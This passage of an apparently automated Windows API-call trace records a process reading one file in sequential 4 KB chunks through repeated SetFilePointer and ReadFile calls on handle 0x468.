lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.428] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x40000 [0088.428] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.430] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x41000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x42000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x43000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x44000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.432] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x45000 [0088.432] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.432] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x46000 [0088.432] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x47000 [0088.433] ReadFile (in: 
hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x48000 [0088.433] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.434] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x49000 [0088.434] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.434] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4a000 [0088.434] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4b000 [0088.435] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4c000 
[0088.435] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4d000 [0088.436] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4e000 [0088.436] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4f000 [0088.437] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.437] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x50000 [0088.437] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.438] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x51000 [0088.438] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.438] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x52000 [0088.438] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.439] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x53000 [0088.439] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.439] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x54000 [0088.439] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.439] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x55000 [0088.440] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.440] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x56000 [0088.440] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.440] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x57000 [0088.440] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.441] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x58000 [0088.441] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.442] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x59000 [0088.442] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.442] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5a000 [0088.442] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.442] SetFilePointer (in: 
hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5b000 [0088.442] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.443] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5c000 [0088.443] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.443] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5d000 [0088.443] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.444] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5e000 [0088.444] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.444] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x5f000 [0088.444] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 
[0088.444] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x60000 [0088.445] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.445] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x61000 [0088.445] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.446] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x62000 [0088.446] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.446] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x63000 [0088.446] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.447] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x64000 [0088.447] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, 
lpOverlapped=0x0) returned 1 [0088.447] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x65000 [0088.447] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.448] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x66000 [0088.448] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.448] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x67000 [0088.448] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.448] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x68000 [0088.450] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.450] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x69000 [0088.450] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, 
lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.451] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6a000 [0088.451] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.451] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6b000 [0088.451] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.452] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6c000 [0088.452] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.452] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6d000 [0088.452] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.453] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6e000 [0088.453] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | 
out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.453] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x6f000 [0088.453] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.453] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x70000 [0088.453] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.454] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x71000 [0088.454] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.455] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x72000 [0088.455] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.455] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x73000 [0088.455] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.456] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x74000 [0088.456] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.456] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x75000 [0088.456] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.457] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x76000 [0088.457] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.457] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x77000 [0088.457] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 